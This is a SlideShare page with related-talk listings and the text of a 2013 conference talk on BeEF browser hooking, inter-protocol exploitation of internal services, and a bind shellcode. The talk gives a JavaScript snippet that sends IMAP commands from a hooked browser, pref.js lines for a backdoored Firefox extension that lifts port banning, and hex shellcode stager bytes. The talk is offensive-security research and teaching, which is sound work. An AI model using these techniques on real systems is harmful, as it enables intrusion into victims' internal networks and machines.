Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writingsbha0909
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Positive Hack Days
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013midnite_runr
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptJulia Yu-Chin Cheng
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterAjin Abraham
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationQuinn Wilton
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injectionDhaval Kapil
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 

En vedette (20)

Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
 
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
 
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycShellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode Execution
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writing
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
Software Exploits
Software ExploitsSoftware Exploits
Software Exploits
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injection
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 

Similaire à Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF

Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefDefconRussia
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...Felipe Prado
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
ClubAJAX Basics - Server Communication
ClubAJAX Basics - Server CommunicationClubAJAX Basics - Server Communication
ClubAJAX Basics - Server CommunicationMike Wilcox
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?Ksenia Peguero
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresRoel Palmaers
 
eSoftHead - groupware solution
eSoftHead - groupware solutioneSoftHead - groupware solution
eSoftHead - groupware solutionNguyen Hai
 
VA Smalltalk Update ESUG2014
VA Smalltalk Update ESUG2014VA Smalltalk Update ESUG2014
VA Smalltalk Update ESUG2014ESUG
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionBart Leppens
 
Java Restart with WebFX
Java Restart with WebFX Java Restart with WebFX
Java Restart with WebFX Nikita Lipsky
 
05.m3 cms list-ofwebserver
05.m3 cms list-ofwebserver05.m3 cms list-ofwebserver
05.m3 cms list-ofwebservertarensi
 
JS digest. Decemebr 2017
JS digest. Decemebr 2017JS digest. Decemebr 2017
JS digest. Decemebr 2017ElifTech
 
DevOps Unleashed: Strategies that Speed Deployments
DevOps Unleashed: Strategies that Speed DeploymentsDevOps Unleashed: Strategies that Speed Deployments
DevOps Unleashed: Strategies that Speed DeploymentsForgeRock
 
Decoupled Architecture and WordPress
Decoupled Architecture and WordPressDecoupled Architecture and WordPress
Decoupled Architecture and WordPressPantheon
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Unikernels: Rise of the Library Hypervisor
Unikernels: Rise of the Library HypervisorUnikernels: Rise of the Library Hypervisor
Unikernels: Rise of the Library HypervisorAnil Madhavapeddy
 
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdfZephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdfAswathRangaraj1
 
Developing Revolutionary Web Applications using Comet and Ajax Push
Developing Revolutionary Web Applications using Comet and Ajax PushDeveloping Revolutionary Web Applications using Comet and Ajax Push
Developing Revolutionary Web Applications using Comet and Ajax PushDoris Chen
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkVeilFramework
 

Similaire à Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF (20)

Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 
ClubAJAX Basics - Server Communication
ClubAJAX Basics - Server CommunicationClubAJAX Basics - Server Communication
ClubAJAX Basics - Server Communication
 
How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?How do JavaScript frameworks impact the security of applications?
How do JavaScript frameworks impact the security of applications?
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
 
eSoftHead - groupware solution
eSoftHead - groupware solutioneSoftHead - groupware solution
eSoftHead - groupware solution
 
VA Smalltalk Update ESUG2014
VA Smalltalk Update ESUG2014VA Smalltalk Update ESUG2014
VA Smalltalk Update ESUG2014
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
Java Restart with WebFX
Java Restart with WebFX Java Restart with WebFX
Java Restart with WebFX
 
05.m3 cms list-ofwebserver
05.m3 cms list-ofwebserver05.m3 cms list-ofwebserver
05.m3 cms list-ofwebserver
 
JS digest. Decemebr 2017
JS digest. Decemebr 2017JS digest. Decemebr 2017
JS digest. Decemebr 2017
 
DevOps Unleashed: Strategies that Speed Deployments
DevOps Unleashed: Strategies that Speed DeploymentsDevOps Unleashed: Strategies that Speed Deployments
DevOps Unleashed: Strategies that Speed Deployments
 
Decoupled Architecture and WordPress
Decoupled Architecture and WordPressDecoupled Architecture and WordPress
Decoupled Architecture and WordPress
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orru
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Unikernels: Rise of the Library Hypervisor
Unikernels: Rise of the Library HypervisorUnikernels: Rise of the Library Hypervisor
Unikernels: Rise of the Library Hypervisor
 
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdfZephyr Introduction - Nordic Webinar - Sept. 24.pdf
Zephyr Introduction - Nordic Webinar - Sept. 24.pdf
 
Developing Revolutionary Web Applications using Comet and Ajax Push
Developing Revolutionary Web Applications using Comet and Ajax PushDeveloping Revolutionary Web Applications using Comet and Ajax Push
Developing Revolutionary Web Applications using Comet and Ajax Push
 
AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
 

Dernier

The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 

Dernier (20)

The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF

  • 1. Rooting your internals: custom shellcode, BeEF and Inter-protocol exploitation antisnatchor HackPra AllStars 2013
  • 2. About myself •Co-author of Browser Hacker’s Handbook (now on pre-order from Amazon.co.uk, available February/March 2014) •BeEF lead core developer •Application Security researcher •Ruby, Javascript, OpenBSD and BlackMetal fan
  • 3. • Current situation and traditional browser attack vectors • BeEF and Inter-Protocol Exploitation • The BeEF Bind shellcode • How the shellcode delivery and exploitation works • Demo fun, current limitations and... About The Talk
  • 4. • Aimed at compromise the browser itself, or plugins • Sandboxes and exploit mitigation techniques make our life difficult • 0-day browser exploits are extremely expensive Current situation traditional browser attack vectors
  • 5. • Is the victims web browser patched? • Do you have $100k to spend on a single 0-day (weaponized) browser exploit? • How many times can you re-use your 0day for targeted attacks before it will be detected, reversed and patched? • How many useful browser exploits are available? Current situation Browser vulnerability exploitation
  • 6. • Is the plugin patched or vulnerable? • How reliable are the plugin exploits? • most latest browsers don’t leak anymore exact plugin info (except for Firefox, thanks Mozilla) • Java-based exploits (also for ROP chains) require user- intervention on many current browsers (i.e. Chrome) • From Java 7 even unsigned applets require explicit user intervention to run! (see Immunity bypass - now patched) Current situation Browser plugin exploitation
  • 7. • Mis-understood, not patched, found in 90% of application pentests • Full DOM manipulation • SOP restrictions, additional HTTP headers restrictions, CSP • In fact, alert(1) is the mostly used attack vector • Oh, wait sorry, also stealing cookies... Current situation Cross Site Scripting
  • 8. Current situation traditional browser attack vectors Internal server vulnerabilities are sitting there bored and lonely...
  • 9. • Imagine a framework like Metasploit, but for browser-based attacks • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security context abuse. • The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context. The scary BeEF changing browser attack vectors
  • 10. • Through a simple XSS or Phishing page, with BeEF we can hook victim browsers and control them entirely with Javascript • No more alert(1) crap • AntiVirus? Fuck that, it’s not going to detect BeEF • Features like ManInTheBrowser,Tunneling Proxy and remote exploits are all implemented in (relatively) simple Javascript The scary BeEF changing browser attack vectors
  • 11. Idea flow read top to bottom Michele: Awesome, let me do some research and lets port it to BeEF Wade: My IPEC research was cool, we should research further Ty: I developed a new staging shellcode that acts like a WebServer
  • 12. • Back in 2006/2007 Wade Alcorn researched what he called Inter-Protocol exploitation • Exploit ‘tolerant’ protocol implementations, which do not drop the client connection after N errors • A properly encoded POST request can be sent to the target: • HTTP request headers are parsed as BAD COMMANDS • HTTP request body is parsed asVALID COMMANDS • HTTP request body also contains shellcode. FUN STARTS Revitalizing IPEC Inter-Protocol Exploitation
  • 13. Revitalizing IPEC Inter-Protocol Exploitation: IMAP var server = '172.16.37.151'; var port = '143'; var commands = 'a01 login root passwordna002 logout'; var target = "http://" + server + ":" + port + "/abc.html"; var iframe = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('name', 'data'); form.setAttribute('action', target); form.setAttribute('method', 'post'); form.setAttribute('enctype', 'text/plain'); var input = document.createElement('input'); input.setAttribute('id', 'data1') input.setAttribute('name', 'data1') input.setAttribute('type', 'hidden'); input.setAttribute('value', commands); form.appendChild(input); iframe.contentWindow.document.body.appendChild(form); form.submit();
  • 14. • Limitations: • SOP and cross-domain restrictions • Port Banning (damn you!) • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? NOPE :D Revitalizing IPEC Inter-Protocol Exploitation: limitations
  • 15. • Limitations: • SOP and cross-domain restrictions •PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 1 On all browsers (except Opera) we can ‘blindly’ send data cross-origin with XHR, without the need to read HTTP responses. This is (usually) enough to pwn services.
  • 16. • Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 http://xyz.com:143/ FF: NS_ERROR_PORT_ACCESS_NOT_ALLOWED Connection to various known port (22/25/143/993/995/etc..) denied. On Firefox, an extension can override config options:
  • 17. • Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Trick the victim to install a backdoor’ed Firefox extension.The pref.js file of the extension contains: // PortBanning override pref("network.security.ports.banned.override", "20,21,22,25,110,143");
  • 18. • Limitations: •SOP and cross-domain restrictions • PortBanning •HTTP Headers size •HTTP Content-Type settings •After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 2 Only about 60 TCP ports are prohibited by Port Banning -> 65465 are allowed :D 220 - imap3 (only IE blocks it :-) 6667 - IRC (Firefox/IE only) 9100 - jetdirect 10000 - ExtraNET you name it: HP OpenView, Java RMI stuff, etc..
  • 19. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 Lots of HTTP headers are automatically created by the browser (around 400 bytes). Most of them cannot be overridden, and cross-domain they are even bigger. We can override some of them:
  • 20. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 3 We can save other 100 bytes overriding the UserAgent through the Firefox extension: pref("general.useragent.override", "Firefox/15.0.1");
  • 21. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 4 The original IPEC paper was using: Content-Type: multipart/form-data; Our approach uses, to save space: Content-Type: text/plain;
  • 22. • Limitations: • SOP and cross-domain restrictions • PortBanning • HTTP Headers size • HTTP Content-Type settings • After exploitation, back to normal out-of-browser shells? Revitalizing IPEC Inter-Protocol Exploitation: solution 5 Not anymore, thanks to the BeEF Bind shellcode. You have a bind shellcode which can be totally controlled through an hooked browser sitting in the same victim internal network.
  • 23. High Level Architecture from FF extension to command execution
  • 24. High Level Architecture from FF extension to command execution
  • 25. High Level Architecture from FF extension to command execution
  • 26. High Level Architecture from FF extension to command execution
  • 27. High Level Architecture from FF extension to command execution
  • 28. 28 BeEF Bind shellcode how it works • Ty Miller created a new staging Windows shellcode, which we called BeEF Bind • He was bored of reverse shells :D • stager -> 299 bytes (326 after bad-char encoding) • stage -> 792 bytes • The stager sets up a bind port on 4444/TCP to accept an HTTP POST request containing the raw stage in a parameter called ‘cmd’. var stager = "xbax6ax99xf8x25xd9xccxd9x74x24xf4x5ex31xc9" + "xb1x4bx83xc6x04x31x56x11x03x56x11xe2x9fx65" + "x10xacx5fx96xe1xcfxd6x73xd0xddx8cxf0x41xd2" + "xc7x55x6ax99x85x4dxf9xefx01x61x4ax45x77x4c" + "x4bx6bxb7x02x8fxedx4bx59xdcxcdx72x92x11x0f" + "xb3xcfxdax5dx6cx9bx49x72x19xd9x51x73xcdx55" + "xe9x0bx68xa9x9exa1x73xfax0fxbdx3bxe2x24x99" + "x9bx13xe8xf9xe7x5ax85xcax9cx5cx4fx03x5dx6f" + "xafxc8x60x5fx22x10xa5x58xddx67xddx9ax60x70" + "x26xe0xbexf5xbax42x34xadx1ex72x99x28xd5x78" + "x56x3exb1x9cx69x93xcax99xe2x12x1cx28xb0x30" + "xb8x70x62x58x99xdcxc5x65xf9xb9xbaxc3x72x2b" + "xaex72xd9x24x03x49xe1xb4x0bxdax92x86x94x70" + "x3cxabx5dx5fxbbxccx77x27x53x33x78x58x7axf0" + "x2cx08x14xd1x4cxc3xe4xdex98x44xb4x70x73x25" + "x64x31x23xcdx6exbex1cxedx91x14x35xdfxb6xc4" + "x52x22x48xfaxfexabxaex96xeexfdx79x0fxcdxd9" + "xb2xa8x2ex08xefx61xb9x04xe6xb6xc6x94x2dx95" + "x6bx3cxa5x6ex60xf9xd4x70xadxa9x81xe7x3bx38" + "xe0x96x3cx11x41x58xd3x9axb5x33x93xc9xe6xa9" + "x13x86x50x8ax47xb3x9fx07xeexfdx35xa8xa2x51" + "x9exc0x46x8bxe8x4exb8xfexbfx18x80x97xb8x8b" + "xf3x4dx47x15x6fx03x23x57x1bxd8xedx4cx16x5d" + "x37x96x26x84";
